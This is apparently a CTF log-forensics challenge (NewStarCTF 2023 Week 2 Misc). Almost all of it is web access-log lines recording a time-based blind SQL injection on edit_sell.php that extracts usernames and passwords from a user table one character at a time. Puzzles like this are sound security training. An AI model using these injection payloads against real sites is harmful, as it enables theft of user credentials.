NewStarCTF 2023 公开赛道 WEEK2|MISC1-序章

题目

172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=59,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=60,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=61,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=62,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=63,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=64,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=65,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=66,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=67,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=68,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=69,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=70,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=71,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=72,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=73,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:21 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=74,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=75,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=76,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=77,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=78,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=79,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=80,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=81,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=82,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=83,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=84,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=85,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=86,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=87,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=88,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=89,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=90,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=91,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=92,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=93,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=94,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=95,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=96,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=97,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=98,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=99,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=100,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=101,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=102,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=103,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=104,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=105,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=106,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=107,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=108,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=109,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=110,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=111,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=112,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=113,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=114,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=115,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=116,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=117,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=118,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=119,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=120,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:22 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),1,1))=121,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=40,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=41,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=42,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=43,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=44,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=45,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=46,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=47,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=48,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=49,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=50,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=51,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=52,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=53,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=54,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=55,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=56,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=57,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
172.17.0.1 - - [20/Aug/2023:00:08:25 +0800] "GET /app/action/edit_sell.php?pid%5B0%5D=-1%20or%20if(ascii(substr((select%20group_concat(username,password)%20from%20user),2,1))=58,sleep(1),1)--+&totalPrice=0 HTTP/1.1" 500 353 "-" "python-requests/2.28.2"
